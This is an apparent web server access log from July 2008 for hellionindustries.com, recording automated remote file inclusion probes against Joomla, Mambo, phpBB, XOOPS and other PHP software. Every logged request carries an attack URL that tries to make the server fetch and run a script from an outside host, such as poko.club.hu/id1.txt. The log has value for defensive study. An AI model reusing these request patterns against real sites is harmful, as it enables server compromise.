210.245.87.117 - - [26/Jul/2008:05:37:22 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:37:23 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:37:23 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
62.75.249.133 - - [26/Jul/2008:05:37:42 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
62.75.249.133 - - [26/Jul/2008:05:37:42 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
89.108.66.227 - - [26/Jul/2008:05:37:48 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
193.111.11.7 - - [26/Jul/2008:05:37:48 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
89.108.66.227 - - [26/Jul/2008:05:37:48 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:38:04 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:38:04 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:38:04 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:38:13 -0700] "GET /logs/access_080716.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:38:13 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:38:14 -0700] "GET /logs/access_080716.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:38:14 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
89.108.66.227 - - [26/Jul/2008:05:38:36 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
65.182.184.197 - - [26/Jul/2008:05:38:36 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
65.182.184.197 - - [26/Jul/2008:05:38:37 -0700] "GET //?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:38:38 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:38:38 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
65.182.184.197 - - [26/Jul/2008:05:38:38 -0700] "GET /logs//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 1658 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
58.65.228.5 - - [26/Jul/2008:05:38:42 -0700] "GET /logs/access_080716.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:38:49 -0700] "GET /logs/access_080624.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
193.111.11.7 - - [26/Jul/2008:05:38:49 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.hellionindustries.com"
67.205.68.170 - - [26/Jul/2008:05:39:23 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
67.205.68.170 - - [26/Jul/2008:05:39:23 -0700] "GET /facileforms.frame.php?ff_compath=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
89.108.66.227 - - [26/Jul/2008:05:39:37 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/stevf57/injek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
89.108.66.227 - - [26/Jul/2008:05:39:38 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/stevf57/injek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
67.205.68.170 - - [26/Jul/2008:05:39:41 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:39:57 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:39:57 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:40:08 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:40:08 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "hellionindustries.com"
67.205.68.170 - - [26/Jul/2008:05:40:11 -0700] "GET /authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.hellionindustries.com"
67.205.68.170 - - [26/Jul/2008:05:40:11 -0700] "GET /logs/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:40:12 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:40:13 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:40:21 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:40:21 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:40:21 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:40:21 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:40:21 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:40:21 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:40:22 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:40:22 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:40:23 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:40:27 -0700] "GET /logs/access_080716.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:40:28 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:40:28 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:40:35 -0700] "GET /logs/access_080716.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:40:35 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:40:35 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:40:44 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:40:44 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:40:52 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:40:52 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:40:53 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:41:04 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:41:04 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:41:04 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:41:05 -0700] "GET /logs/access_080716.log//admin/classes/TplLoad.php?full_path_to_public_program=http://ownedson.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:41:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://ownedson.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:41:06 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://ownedson.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
89.255.60.6 - - [26/Jul/2008:05:41:12 -0700] "GET /logs/access.log//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:41:13 -0700] "GET /logs/access_080621.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
89.188.110.30 - - [26/Jul/2008:05:41:35 -0700] "GET //cms/modules/form.lib.php?sourceFolder=http://www.geocities.com/jempiak/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
89.108.66.227 - - [26/Jul/2008:05:41:42 -0700] "GET /logs/access_080625.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:41:43 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:41:43 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "hellionindustries.com"
62.213.78.149 - - [26/Jul/2008:05:41:43 -0700] "GET //cms/modules/form.lib.php?sourceFolder=http://www.geocities.com/jempiak/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:41:51 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:41:54 -0700] "GET /logs/access_080625.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
89.108.66.227 - - [26/Jul/2008:05:41:58 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/stevf57/injek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:42:00 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:42:00 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
64.22.89.194 - - [26/Jul/2008:05:42:03 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
64.22.89.194 - - [26/Jul/2008:05:42:03 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
64.22.89.194 - - [26/Jul/2008:05:42:03 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:42:05 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:42:05 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:42:12 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:42:13 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "hellionindustries.com"
207.44.234.103 - - [26/Jul/2008:05:42:15 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
207.44.234.103 - - [26/Jul/2008:05:42:15 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
207.44.234.103 - - [26/Jul/2008:05:42:15 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ilovesea.net/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:42:33 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:42:33 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:42:35 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:42:35 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:42:35 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:42:36 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:42:36 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://ownedson.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:42:36 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://ownedson.110mb.com/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:42:43 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:42:44 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:42:53 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
62.75.249.133 - - [26/Jul/2008:05:43:05 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:43:06 -0700] "GET /logs/access_080716.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
62.75.249.133 - - [26/Jul/2008:05:43:06 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
67.205.68.170 - - [26/Jul/2008:05:43:10 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
67.205.68.170 - - [26/Jul/2008:05:43:10 -0700] "GET /facileforms.frame.php?ff_compath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
194.85.90.172 - - [26/Jul/2008:05:43:26 -0700] "GET /logs/access_080716.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
194.85.90.172 - - [26/Jul/2008:05:43:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
194.85.90.172 - - [26/Jul/2008:05:43:27 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:43:29 -0700] "GET /logs/access_080717.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:43:29 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:43:29 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:43:31 -0700] "GET /logs/access.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.245.87.117 - - [26/Jul/2008:05:43:32 -0700] "GET /index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
